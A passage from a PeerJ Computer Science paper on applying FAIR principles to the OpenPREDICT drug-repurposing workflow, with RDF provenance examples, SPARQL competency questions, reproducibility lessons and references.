. Retrospective provenance We represent the concrete executions that happened and the concrete output that was generated with a p-plan:Activity that is linked to a p-plan:Step through the p- plan:correspondsToStep property and to the outputs (opmw:WorkflowExecutionArtifact) through prov:generated. Each output has a value (e.g., accuracy rate) and is linked to Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 12/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 prov:Generation through the prov:qualifiedGeneration property, which specifies when the generation occurred with (prov:atTime). This is an example: opredict: Activity_Model_preparation_train_and_evaluation_Execution_1546302862 rdf:type p-plan:Activity ; p-plan:correspondsToStep opredict: Step_Model_preparation_train_and_evaluation ; prov:generated opredict:ModelEvaluation_Accuracy_Execution_1546302862 ; prov:generated opredict: ModelEvaluation_AveragePrecision_Execution_1546302862 ; prov:generated opredict:ModelEvaluation_F1_Execution_1546302862 ; prov:generated opredict:ModelEvaluation_Precision_1546302862 ; prov:generated opredict:ModelEvaluation_Recall_Execution_1546302862 ; prov:generated opredict:ModelEvaluation_RocAuc_Execution_1546302862 ; . opredict:ModelEvaluation_Accuracy_Execution_1546302862 rdf:type mls:ModelEvaluation ; dc:description "0.833336" ; mls:specifiedBy opredict:EvaluationMeasure_PredictiveAccuracy ; prov:qualifiedGeneration opredict:Generation_Execution_1546302862 ; . opredict:Generation_Execution_1546302862 rdf:type prov:Generation ; prov:atTime "2019 -01 -01 T00 :02:31.011"^^ xsd:dateTime ; Versioning of workflows We track the modification across the two versions with the dc:hasVersion property on the level of a dul:Workflow, p-plan:Plan, dc:LinguisticSystem, and prov:SoftwareAgent. Furthermore, we use the prov:wasRevisionOf property to link to the previous version. This is an example: opredict:Plan_Main_Protocol_v02 rdf:type p-plan:Plan ; rdf:type dul:Workflow ; dc:created "2019 -05 -15" ; dc:creator opredict:Agent_Remzi ; dc:description "OpenPREDICT Main Protocol v.0.2" ; dc:hasVersion "0.2" ; dc:language :LinguisticSystem_xsd_language_English ; dc:modified "2019 -07 -03" ; pwo:hasFirstStep opredict:Step_Prepare_Input_Data_Files_v02 ; rdfs:label "Main Protocol v.0.2" ; prov:wasAttributedTo opredict:Agent_Remzi ; prov:wasRevisionOf opredict:Plan_Main_Protocol_v01 ; . opredict:Plan_Main_Protocol_v01 rdf:type p-plan:Plan ; rdf:type dul:Workflow ; dc:created "2018 -11 -27" ; dc:creator opredict:Agent_Remzi ; dc:description "OpenPREDICT Main Protocol v.0.1" ; dc:hasVersion "0.1" ; dc:language :LinguisticSystem_xsd_language_English ; dc:modified "2019 -05 -15" ; pwo:hasFirstStep opredict:Step_Prepare_Input_Data_Files ; rdfs:label "Main Protocol v.0.1" ; prov:wasAttributedTo opredict:Agent_Remzi ; Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 13/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 EVALUATION In this section we describe the evaluation of our approach, consisting of two parts: first, we revisit each FAIR principle and explain how the principle is addressed. Second, we applied the traditional ontology validation methodology by answering the competency questions through the execution of SPARQL queries (the concrete queries are available in GitHub repo). Addressing the FAIR principles In order for our workflow to comply with FAIR principles, we checked each FAIR criterion defined in Wilkinson et al. (2016), as identified between parentheses below. First, global and persistent identifiers were assigned to resources defined in the workflow and associated data. Rich metadata for workflow and input and output data were created using HCLS (https://www.w3.org/TR/hcls-dataset/) and FAIR data point specification (F2). In addition, the metadata we generated contains an explicit global and persistent identifier of the data they describe (F3). In order to enable the workflow and the data used to be searched, they were uploaded in a triple-store as a FAIR Data Point (https://graphdb.dumontierlab.com/repositories/openpredict). Data can be queried through SPARQL over HTTP(S) protocol (A1.1). Since the data is not private or protected, we don’t require authentication and authorisation mechanism (A1.2). All data and metadata are permanently available at Zenodo (https://doi.org/10.5281/zenodo.3770918) to make the metadata accessible even the data is no longer available (A2). We used RDF and OWL with commonly used controlled vocabularies and ontologies such as Bio2RDF vocabulary, SIO and PROV to model input data and workflows (I1). HCLS dataset specification and FAIR Data Point specification were used to define the metadata and provenance of data (I2). Meaningful links between (meta)data such Bio2RDF links and data and workflow were created (I3). To increase reusability of the workflow, we describe the workflow and its data with community standards such as ML-Schema and P-PLAN (R1). We provide the license (R1.1) and provenance information in the metadata using FAIR data point specification (R1.2), and HCLS specification (R1.3) and PROV. Answering competency questions Besides evaluating whether each FAIR principle was addressed, we also assessed the unified model using the common semantic validation approach, which is based on SPARQL queries used to answer the competency questions. All questions listed in ‘The FAIR Workflows Approach’ could be answered by running the SPARQL queries over the OpenPREDICT use case. The complete queries and results can be found online (https://github.com/fair-workflows/openpredict). Therefore, the reproduction of this validation can be performed by re-executing the queries on the RDF representation of the OpenPREDICT workflow. Below we explain the result for each competency question. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 14/29 https://peerj.com https://www.w3.org/TR/hcls-dataset/ https://graphdb.dumontierlab.com/repositories/openpredict https://doi.org/10.5281/zenodo.3770918 https://github.com/fair-workflows/openpredict http://dx.doi.org/10.7717/peerj-cs.281 CQ1 - Questions about manual steps. CQ1.1: which steps are meant to be executed manually and which to be executed computationally? The SPARQL query we built to answer this question first filters all steps within the first version of OpenPREDICT workflow (opredict:Plan_Main_Protocol_v01). The results show each step and its type—manual (bpmn:ManualTask) or computational (bpmn:ScriptTask)—as well as the respective instructions (p-plan:Plan) that describe the steps. In summary, OpenPREDICT v0.1 has 28 manual steps and 14 computational steps (42 in total), while v0.2 has 9 manual steps and 9 computational steps (18 in total). This difference reflects the automatization of most of the manual steps within data preparation (evolving from manual to computational) and the simplification of the computational steps described in fewer Jupyter Notebook cells. CQ1.2:For the manual steps, who are the agents responsible to execute them? To answer this question we filtered the results for only manual steps through the statement: values ?stepType bpmn:ManualTask The result is a list of all steps and roles related to each one, such as executor, creator, developer, and publisher. For example, Remzi is creator, developer and executor of all instructions, while Ahmed is developer of some computational steps and Joao is the executor of the entire OpenPREDICT workflow. This approach allows for the representation of multiple roles played by different agents within each step. As in related approaches such as Workflow4ever and Reproduce-me, we use the PROV ontology to address the different types of agents and roles through the prov:wasAttributedTo property, and apply the dc:creator and dc:publisher properties for the direct relation from an instruction to an agent. CQ1.3: Which datasets were manually handled and what are their formats? OpenPREDICT’s computational steps use datasets, as explained in ‘FAIRified data collection’, that required manual pre-processing. The difference between v0.1 and v0.2 is that we automated the manual pre-processing of two datasets in v0.2; MESH Phenotype annotations and protein-protein inter-actions. The main elements of the query reflect the FAIR data point specification with DCAT elements (dcat:Distribution, dcat:downloadURL and dcat:mediaType), PROV (prov:Usage and prov:qualifiedUsage) and EDAM classification for data handling steps (edam:operation_2409) and data formats (media types). CQ1.4: What are the types of manual steps involved, and what are their inputs and outputs? Similar to the Reproduce-me approach, our ontology leverages on the P-PLAN ontology to address the variables used as input and output of the manual steps, mostly during data preparation in OpenPREDICT v0.1, such as downloading and saving the datasets listed in the results of CQ1.3. For example, the input of opredict:Step_Save_files_in_triplestore are variables that indicate the local file of each dataset (serialized as RDF) and the output variable indicating the endpoint to upload all datasets (opredict:Variable_Triplestore_endpoint_for_input_data). Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 15/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 When changing the filter from manual steps to computational steps, the pattern followed was to classify the output variables of a step (a Jupyter Notebook cell) according to the data saved in files. For example, in feature generation, the opredict:Step_Feature_generation_01_Pipeline_Source_Cell11 has an output variable for drug fingerprint similarity, indicating the generation of the file ‘‘drugs-fingerprint-sim.csv’’. CQ2 - Questions about instantiation of general workflows by more specific ones. CQ2.1: What are the main steps of a general workflow? OpenPREDICT workflow follows the common machine learning pipeline process of: data preparation, feature generation, model training, model evaluation and presentation of results. The query returns these steps by looking for the first step of the workflow (through pwo:hasFirstStep) and following the preceding path in a recursive way, e.g., ?step1 dul:precedes ?step2. ?step2 dul:precedes ?step3. ?step3 dul:precedes ?step4. (until there is no preceding steps) The classification of the step is given by the EDAM specializations of the Operation concept (operation_0004), such as Data Handling for data preparation (edam:operation_2409). For the sake of simplicity, model training and evaluation were performed within the same step. The main steps are listed below: opredict:Step_Prepare_Input_Data_Files opredict:Step_Feature_generation_Pipeline_OpenPREDICT_ipynb opredict: Step_Model_preparation_train_and_evaluation_Workflow_OpenPREDCIT_ - _ML_ipynb opredict:Step_Format_results_for_presentation CQ2.2: What are the steps of a specific workflow? Similar to the previous question, the SPARQL query uses the properties that allow for the ordering of steps execution (pwo:hasFirstStep and dul:precedes). The pattern p- plan:Step dul:isDescribedBy p-plan:Plan allows us to answer this question, by representing how a step is described by an instruction. This pattern resembles the one used by Workflow4ever, which applies the wfdesc:hasWorkflowDefinition (dul:isDescribed) to link a wfdesc:Workflow (p-plan:Step) to a wfdesc:WorkflowDefinition (p-plan:Plan), aiming at representing the instructions (e.g., a Python script) that are natively understood by the wfdesc:WorkflowEngine (prov:SoftwareAgent). However, different from this approach, we classify the instruction language (p-plan:Plan dc:language dc:LinguisticSystem), allowing for the representation of instructions that follow computer language or natural language, which includes pseudo-code—commonly used to specify algorithms before implementing in a particular computer language. The results show that OpenPREDICT has 78 steps in total, where 60 steps belong to v0.1 and 18 belong to v0.2, each step linked to an instruction. 9 instructions were reused from v0.1 to v0.2 regarding data preparation, thus, v0.2 presents 9 new instructions that are used to automate the data preparation phase. These instructions are written as either English (natural language) or Python 3.5 (computer language), where most of the Python Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 16/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 ones refer to the Jupyter notebook cells for feature generation and model training and evaluation. CQ2.3: What higher-level description does a certain workflow step instantiate? The SPARQL query to answer this question includes the pattern p-plan:Plan dul:isDescribedBy p-plan:Plan, which extends the capability described in the previous question, i.e., decoupling steps from instructions, enabling the representation of different abstraction levels of instructions and their relations. This pattern resembles the links between specification artefacts (e.g., conceptual model, activity diagrams and use cases) and implementation artefacts (e.g., software code, deployment procedures and automated tests) in software engineering. Usually, a specification artefact aims at describing the instructions necessary to enable a programmer to create the software code, sometimes automatically generated as in model-driven engineering. For example, a pseudo-code within an activity diagram (p-plan:Plan) may describe the behaviour expected (dul:isDescribed) for the algorithm behind a service endpoint, which may be implemented as a Python script (p-plan:Plan). OpenPREDICT did not formally follow the specification phase of software engineering since it is a research project, having the code developed from the data scientist interpretation perspective about publications related to PREDICT. In research-oriented data science this type of approach is common. However, we created some examples of the pattern that represent the specification of OpenPREDICT workflow. Therefore, the results of this query include 10 Jupyter Notebook cell instructions (p-plan:Plan), representing implementation artefacts, that were specified (p-plan:isDescribedBy) by 3 specification instructions (p- plan:Plan). The level of abstraction can be derived from the properties of the instruction. For example, the 10 Jupyter Notebook cell instructions were written (dc:language) in Python 3.5 (schema:ComputerLanguage), while the 3 specification instructions were written in English (en value of xsd:language). Furthermore, this approach enables links of s (specification artefacts) x i (implementation artefacts), where i¿s, i.e., a specification artefact usually describes several software code lines (instructions). In OpenPREDICT, the first specification instruction guides the load of input datasets, which is linked to cells 1–5 of the feature generation step, while the second guides the calculation of scores between pairs of drugs and compute similarity feature, which is linked to cells 6–9. CQ3 - Questions about versioning of workflows and their executions CQ3.1: What are the existing versions of a workflow and what are their provenance? The collective workflow (the whole) is represented as a dul:Workflow and a p-plan:Plan. Similar to other approaches (Workflow4ever, Reproduce-me, CWLProv, among others) the query to answer this question makes use of DC properties (e.g., dc:creator, dc:created, dc:modified) and PROV (e.g., prov:wasAttributedTo) for prospective provenance. It also covers workflow versioning through dc:hasVersion and prov:wasRevisionOf, where the former is responsible for version of dul:Workflow and the latter to link an instruction to another (p-plan:Plan prov:wasRevisionOf p-plan:Plan pattern). The retrospective Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 17/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 (executions) provenance is supported by the link from an execution (a p-plan:Activity) to the correspondent step (p-plan:correspondsToStep property), which is a pattern that resembles most of the aforementioned semantic models. The main difference here is the assumption that any instruction (p-plan:Plan) should be versionable, thus, all executions link to a versioned instruction. Differently from Workflow4ever approach, here we do not introduce any elements regarding the specification of the changes (e.g., roevo:ChangeSpecification). The results for OpenPREDICT show 2 workflows (v0.1 and v0.2), both created by and attributed to Remzi, where v0.2 links to the prior version (v0.1). CQ3.2: Which instructions were removed/changed/added from one version to another? Three SPARQL queries were written to answer whether the instructions of OpenPREDICT v0.1 were removed or changed or added in v0.2. Each SPARQL uses the identifier of the workflow versions (retrieved in CQ3.1) as an input parameter to perform the comparison from one version to another. For the query for removed instructions, it considers all instructions used in v0.1 that are not used in v0.2 and excludes the instructions that were changed. For the query for changed instructions, it considers the instructions with the prov:wasRevisionOf property. For the query for added instructions, the SPARQL query uses the reverse logic from the removed. Forty-seven instructions were removed from v0.1 to v0.2 due to the refactoring of the code of feature generation, model training and model evaluation, and the elimination of several manual steps in data preparation. Three instructions were changed, reflecting the porting of the FAIRification manual steps to computational steps in data preparation, i.e., download and save human interactome and phenotype annotations. Seven instructions were added in v0.2, where 3 of them represent the new Python scripts for data preparation of the new data sources, other 3 represent the new scripts for feature generation and the remaining for model training. CQ3.3: Which steps were automatized from one version to another? This query is quite similar to the one used for changed instructions (CQ3.2) but it makes explicit that the old version of the instruction used as manual step (bpmn:ManualTask) was modified to an instruction used as computational step (bpmn:ScriptTask) in the new version. The results confirm the findings from the previous query regarding the 3 instructions that were ported from manual steps to computational steps, namely the data preparation top-level instruction, the FAIRification instructions (download and save human interactome and phenotype annotations). Although our approach covers change management, we face the same challenges regarding the dependency of the developer practices for code versioning. This means that, for example, a developer is free to choose whether to remove files from an old version of the software implementation and add files to the new version, even though these files refer to the same capability or routines. Most of the version controls track the changes when the files (old and new) have the same name and path (i.e., the step identifier), which is a similar approach used here. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 18/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 CQ3.4: Which datasets were removed, changed, or added from one version to the next? This question can be answered by mixing the same query of CQ1.3 (datasets manually used) with the logic used in query CQ3.2, i.e., one SPARQL query to the datasets removed, one for the changed and one for the added. The query results over OpenPREDICT (v0.1 and v0.2) confirm the findings of CQ1.3, where none datasets were removed from the old version to the new, none changed and 2 were added. CQ3.5: Which workflow version was used in each execution and what was generated? This question is answered by using the pattern p-plan:Activity p-plan:correspondsToStep p-plan:Step, where the step is part of the dul:Workflow that provides the workflow version. The OpenPREDICT workflow had 14 executions represented with our unified model, exemplifying the execution of some computational steps, i.e., each one a particular Jupyter Notebook cell. Therefore, this approach allows for the representation of multiple executions of each step according to the version of the corresponding instruction. Each execution inherits the properties of p-plan:Activity, e.g., the event start and end time points. Furthermore, each execution is associated to the correspondent generated artefacts through the p-plan:Activity prov:generated opmw:WorkflowExecutionArtifact pattern, a similar approach of Workflow4ever, which applied the inverse property prov:wasGeneratedBy. An artefact generated by an execution can be an evaluation measure of the trained model, such as the model accuracy and recall for that particular execution, i.e., a mls:ModelEvaluation. Therefore, OpenPREDICT executions generated the values about the model evaluation measures of accuracy, average precision, F1, precision, recall and ROC AUC. For example, the results show that the model accuracy of v0.1 is 0.83, while v0.2 is 0.85. This query can be further extended by considering the particular version of each instruction that the executed step implements. In addition, ideally, each output of a Jupyter Notebook cell should be represented as a opmw:WorkflowExecutionArtifact, so all generated outputs are stored (similar to ProvBook/Reproduce-me approach). This query can be easily changed to provide aggregations for related analytical questions, such as how often each workflow version was executed. DISCUSSION Before we move on to discuss the encountered reproducibility challenges and other issues, we would like to first highlight the two FAIR perspectives that our approach embodies and demonstrates. Firstly, FAIR applies to the datasets that a scientific workflow consumes and produces, e.g., the protein–protein interactions dataset used by OpenPREDICT, and we need FAIRification approaches to raise existing datsets to this standard. This is the aspect the FAIR principles originally focused on. On top of that, we have here proposed and exemplified a second perspective. This additional perspective regards the workflows’ own FAIRification, i.e., the process of aligning them with the FAIR principles, which relies on a semantic modelling approach such as the one described in this paper. Our work therefore Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 19/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 expands the notions of FAIR and FAIRification from the relatively static artifacts of datasets to the dynamic processes of workflows. Reproducibility challenges It was expected that our study would be unable to fully reproduce the accuracy of the method reported in the PREDICT paper due to use of different input datasets. The performance results of this study are lower than originally reported. The PREDICT paper reported an AUC of 0.90 in cross-validation, but using the same gold standard, we could only achieve AUC of 0.83. We were also able to obtain the drug and disease similarity matrices used in PREDICT from the authors via email request. Given 5 drug–drug similarity measures for 593 drugs and 2 disease–disease similarity measures for 313 diseases, there are resulting 10 features of combined drug-disease similarities. The logistic classifiers were trained with these pre- computed similarity scores and an average AUC of 0.85 was obtained from 10 repetitions in a 10-fold cross-validation scheme. This is still a significant difference from the AUC of 0.90 what the authors reported in PREDICT study. This indicates that there was more likely an error in the design or implementation of evaluation, and not the aggregation of data nor the calculation of drug-drug and disease-disease similarity scores. While attempting to reproduce the PREDICT study, we faced the following issues, which we have turned into generic recommendations (highlighted in italics). 1. Insufficient documentation Essential details concerning the calculation of features were not clearly defined, nor was the software code to perform the calculations provided. Many details of an experiment, including data sets, processing parameters and applied software and algorithms need to be specified in order to facilitate the replication of the results. A methods section in a scientific article may not be the best place to provide all this information as it is usually limited by size constraints and different organization styles of journals and conference proceedings, leading to a lack of required detail. 2. Inaccessible or missing data Since no data except the gold standard data (drug–disease associations) were given, the features for the PREDICT workflow were reconstructed using the publicly accessible databases DrugBank and KEGG and SIDER. However, we could not check if this resulted in exactly the same datasets. The original data that were available to the authors could be absent or no longer accessible to others for many reasons. Sufficient data should be published to enable reproducing a study. 3. Versioning and change of data In PREDICT, publicly accessible datasets have been used to construct models and validate hypotheses for prediction of drug indications and drugs were identified by their Drugbank IDs. However, Drugbank IDs are subject to change over time. For example, two drugs (DB00510, DB00313) in the original dataset were merged to the same drug within the current version of the Drugbank. Results or hypotheses may change as a result of updated input data. In order to reconstruct the original conclusion, it is important to record the version or the date of the data that were used in a study. This is especially important as publicly accessible datasets are increasingly used to construct models and validate hypotheses for prediction of drug indications. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 20/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 4. Execution environment and third-party dependencies In the PREDICT study, the versions of some software tools, such as the library for semantic similarity calculation, were not specified. The versions of software libraries, packages and tools used in a workflow should be explicitly mentioned, and an effort must be made to maintain the access to those releases used in the original workflow. Further Issues Encountered While the execution of the FAIRification process in the OpenPREDICT was straightforward, the semantic modelling of the unified workflow model was challenging. The reuse of existing semantic vocabularies for the representation of our unified model proved to be an extensive task. There are several existing semantic approaches to represent workflows that present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. Computational workflow languages such as CWL and WDL do not intend to define a semantic representation for workflows that involve both manual and computational steps and enrich the workflows with sufficient metadata to make them FAIR. The prospective part of Workflow4ever implementation (wfdesc (https://raw.github.com/wf4ever/ro/0.1/wfdesc.owl)) has consistency issues such as missing disjointness and licensing elements, besides not conforming to the documentation (e.g., for all elements related to workflow templates). On the other hand, semantic models like DUL, PROV and P-PLAN presented higher quality and common foundations (in DOLCE), while being easier to reuse and extend. Although CWLProv also provides an ontology-based on W4ever semantic models, it is oriented only to retrospective provenance of computational steps, reusing most of the predicates that P-PLAN extends (from PROV). Furthermore, the URI (https://w3id.org/cwl/prov#) does not provide a concrete description of the new predicates (e.g., cwlprov:image) and neither resolves to the RDF model (TBox). A question that may arise is whether it would be better to create a new ontology from scratch rather than creating a unified model based on the existing ontologies. We believe that high quality semantic models should be reused, taking benefit from the lessons learned. Furthermore, we consider that reusing existing semantic workflow models actually improve semantic interoperability, while creating a new ontology may impede interoperability if it is not accompanied with alignments to the existing semantic models. Therefore, our approach appears to lead to an improved semantic interoperability. Because we reused several semantic models, the competency questions that they target are potentially addressed by our approach. For example, the gap in our approach regarding the representation of change management for versioning can be addressed by reusing some elements from the versioning approach of Workflow4ever, e.g., roevo:Change, roevo:ChangeSpecification and roevo:VersionableResource. Deciding which type of approach should be used for role representation should be based on the needs for either a fine-grained definition of the role/relator pattern (a reified relationship), such as the prov:Association approach, or a simple property, such as dc:creator. While the former (1) enriches the definition of the role (an improved representation capability), the latter (2) is less verbose: Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 21/29 https://peerj.com https://raw.github.com/wf4ever/ro/0.1/wfdesc.owl https://w3id.org/cwl/prov# http://dx.doi.org/10.7717/peerj-cs.281 (1) ?Association prov:agent opredict:Remzi; prov:hadRole opredict:Creator; prov:hadPlan ?plan. (2) ?plan dc:creator ’Remzi ’ . One of the main challenges is to understand the different terminology used for similar conceptualizations. Although the definitions of terms like plan, process, protocol, procedure, workflow, plan specification and standard operating procedure seem to be the same (or quite overlapping), their meanings become notoriously ambiguous across varied communities. How to grasp these semantic differences is a crucial question that needs further exploration. For example, in the bioinformatics community, the term Workflow usually refer to an implemented (computational) piece of software, i.e., a set of programming language instructions, usually developed with a Workflow Management System as a Workflow Application (Da Cruz, Campos & Mattoso, 2012). Meanwhile, in software engineering, the Workflow term is usually referred to a detailed business process within the Business Process Modelling (BPM) research. Usually, the BPM languages conform to graphical notations (e.g., BPMN, EPC, ARIS), targeted to human comprehension rather than computational ends (process design/modelling). Additionally, some BPM languages focus on representing, at a lower level of abstraction, the process execution details, e.g., BPEL (process implementation) (Rosemann & vom Brocke, 2015). This is a topic extensively covered by Service Oriented Architecture (SOA) initiatives. Several related works target the gap that exists between business process models and workflow specifications and implementations, such as service composition schemes (Stephan, Thomas & Manfred, 2012) and formal provenance of process executions and versioning (Krishna, Poizat & Salan, 2019). Furthermore, some of these languages provide predicades for forks and conditionals, which were intentionally not included in the unified model since they have a high complexity - it is still a topic under discussion in the CWL community, for example. In future work we will improve the modelling of manual steps by studying and possibly incorporating predicates from the SMART protocols ontology. We will characterize the abstraction levels of workflows based on multi-level process modelling approaches, such as the widespread adopted APQC’s Process Classification Framework (PCF). The PCF provides 5 abstraction levels for process specification, from a high abstraction level to detailed workflow specification: category (level 1), process group (level 2), process (level 3), activity (level 4) and task (level 5). Although this framework aims at providing a methodological approach for business process specification, we should investigate whether the minimal information elements of each level require proper representation in the ontology. We should also consider the challenges of process refinement (’’process description in a more fine-grained representation’’) (Ren et al., 2013). A process refinement mechanism maps and/or derives models from a higher-level specification to a detailed level, equivalent to vertical and exogenous model transformations in model-driven engineering. Typical refinement categories will be investigated, such as activity decomposition principles about event delivery and execution condition transference (Jiang et al., 2016; Muehlen & Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 22/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 Rosemann, 2004). The representation of intentionality of the activities within business processes will also be addressed in future work through goal-oriented semantic process modeling (Horkoff et al., 2019), linking goals to activities and roles. Industry-oriented approaches are also being investigated, such as Extract, Transform and Loading (ETL/ELT) for data warehousing and SQL Server Integration Services, which considers a workflow as a control flow, while a dataflow transforms data from a source to a destination. Furthermore, Product Line Management (PLM) tools should be investigated, especially the ones that cover Laboratory Information Management System (LIMS), which provides important concepts such as Bill-of-Materials (BoM), specifications and their certifications. For example, in PLM a specification is a description of raw materials and packaging materials, and semi-finished and finished products. This description may contain product characteristics (e.g., chemical compounds), recipes (e.g., BoM), production methods, quality norms and methods, artwork, documents and others. Ultimately, initiatives like CWL, the Center for Expanded Data Annotation and Retrieval (CEDAR) (for metadata management) (Gonalves et al., 2017) and FAIRsharing.org (for indexing FAIR standards) may be used as building blocks for the envisioned FAIR workbench tool, which can be a reference implementation over a workflow system such as Jupyter Notebook (e.g., a plug-in). Finally, the validation of the reproducibility level of a workflow should consider specific FAIR metrics that take in consideration specific recommendations (e.g., from CWLProv approach) and the practices for higher reproducibility of Jupyter notebooks (Pimentel et al., 2019). CONCLUSIONS In this work, we examined how FAIR principles can be applied to scientific workflows. We adopted the FAIR principles to make the PREDICT workflow, a drug repurposing workflow based on machine learning, open, reproducible, and interoperable. From this stems, the main contribution of this paper, the OpenPREDICT case study, which demonstrates how to make a machine learning workflow FAIR and open. To do this, we created a unified model that reuses several semantic models to show how a workflow can be semantically modeled. We published the workflow representation, data and meta-data in a triple store which was used as FAIR data point. In addition, new competency questions have been defined for FAIR workflows and how these questions can be answered through SPARQL queries. Among the main lessons learned, we highlight how the main existing workflow modelling approaches can be reused and enhanced by our unified model. However, reusing these semantic models showed to be a challenging task, once they present reproducibility issues and different conceptualizations, sometimes overlapping in their terminology. In the future, we envision that the intensive human effort that we had to perform in order to make a workflow FAIR will be taken care of by smart and intuitive workflow tools. As a prototype of such a tool, we are currently developing the FAIR workbench as a general tool that allows users to deal with workflows and protocols in a semantic and FAIR form. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 23/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.281 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Dutch Research Council (NWO) (No. 628.011.011) and the Netherlands eScience Center (No.NLeSC P 17.0201). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Dutch Research Council: 628.011.011. Netherlands eScience Center (No. NLeSC P 17.0201): NLeSC P 17.0201. Competing Interests The authors declare there are no competing interests. Author Contributions • Remzi Celebi and Joao Rebelo Moreira conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Ahmed A. Hassan analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Sandeep Ayyar analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. • Lars Ridder, Tobias Kuhn and Michel Dumontier conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code are available at GitHub: https://github.com/fair-workflows/openpredict. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.281#supplemental-information. REFERENCES Ashburn TT, Thor KB. 2004. Drug repositioning: identifying and developing new uses for existing drugs. Nature Reviews Drug Discovery 3(8):673–683 DOI 10.1038/nrd1468. Baker M. 2016. 1,500 scientists lift the lid on reproducibility. Nature 533(7604):452–454 DOI 10.1038/533452a. Barrell D, Dimmer E, Huntley RP, Binns D, ODonovan C, Apweiler R. 2009. The GOA database in 2009—an integrated Gene Ontology Annotation resource. Nucleic Acids Research 37(suppl_1):D396–D403. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 24/29 https://peerj.com https://github.com/fair-workflows/openpredict http://dx.doi.org/10.7717/peerj-cs.281#supplemental-information http://dx.doi.org/10.7717/peerj-cs.281#supplemental-information http://dx.doi.org/10.1038/nrd1468 http://dx.doi.org/10.1038/533452a http://dx.doi.org/10.7717/peerj-cs.281 Barrett T, Edgar R. 2006. Gene expression omnibus: microarray data storage, submis- sion, retrieval, and analysis. In: Methods in enzymology. Vol. 411. United States: Elsevier, 352–369 DOI 10.1016/S0076-6879(06)11019-8. Begley CG, Ellis LM. 2012. Drug development: raise standards for preclinical cancer research. Nature 483(7391):531–533 DOI 10.1038/483531a. Belhajjame K, Zhao J, Garijo D, Gamble M, Hettne K, Palma R, Mina E, Corcho O, Gmez-Pérez JM, Bechhofer S, Klyne G, Goble C. 2015. Using a suite of ontologies for preserving workflow-centric research objects. Journal of Web Semantics 32:16–42 DOI 10.1016/j.websem.2015.01.003. Bisgin H, Liu Z, Fang H, Kelly R, Xu X, Tong W. 2014. A phenome-guided drug repositioning through a latent variable model. BMC Bioinformatics 15(1):267–267 DOI 10.1186/1471-2105-15-267. Bizer C, Heath T, Berners-Lee T. 2009. Linked data-the story so far. International Journal on Semantic Web and Information Systems 5(3):1–22. Borgo S, Masolo C. 2010. Ontological foundations of dolce. In: Poli R, Healy M, Kameas A, eds. Theory and applications of ontology: computer applications. Dordrecht: Springer, 279–295 DOI 10.1007/978-90-481-8847-5_13978-90-481-8847-5. Callahan A, Cruz-Toledo J, Dumontier M. 2013. Ontology-based querying with Bio2RDFs linked open data. Journal of Biomedical Semantics 4(1):1–13. Caniza H, Romero AE, Paccanaro A. 2015. A network medicine approach to quantify distance between hereditary disease modules on the interactome. Scientific Reports 5:17658. Cheng F, Liu C, Jiang J, Lu W, Li W, Liu G, Zhou W, Huang J, Tang Y. 2012. Prediction of Drug-Target Interactions and Drug Repositioning via Network-Based Inference. PLOS Computational Biology 8(5):e1002503 DOI 10.1371/journal.pcbi.1002503. Cohen-Boulakia S, Belhajjame K, Collin O, Chopard J, Froidevaux C, Gaignard A, Hinsen K, Larmande P, Bras YL, Lemoine F, Mareuil F, Mnager H, Pradal C, Blanchet C. 2017. Scientific workflows for computational reproducibility in the life sciences: Status, challenges and opportunities. Future Generation Computer Systems 75:284–298 DOI 10.1016/j.future.2017.01.012. Collins S, Genova F, Harrower N, Hodson S, Jones S, Laaksonen L, Mietchen D, Petrauskaitė R, Wittenburg P. 2018. Turning FAIR into reality: final report and action plan from the European Commission expert group on FAIR data. DOI 10.2777/15242. Correa Publio G, Esteves D, Lawrynowicz A, Panov P, Soldatova L, Soru T, Vanschoren J, Zafar H. 2018. ML-Schema: exposing the semantics of machine learning with schemas and ontologies. In: Reproducibility in machine learning workshop, ICML. CrowdFlower. 2016. Data science report. Available at https://visit.figure-eight.com/rs/ 416-ZBE-142/images/CrowdFlower_DataScienceReport_2016.pdf (accessed on 09 October 2019). Da Cruz SMS, Campos MLM, Mattoso M. 2012. A foundational ontology to support scientific experiments. In: CEUR workshop proceedings. 144–155. Celebi et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.281 25/29 https://peerj.com http://dx.doi.org/10.1016/S0076-6879(06)11019-8 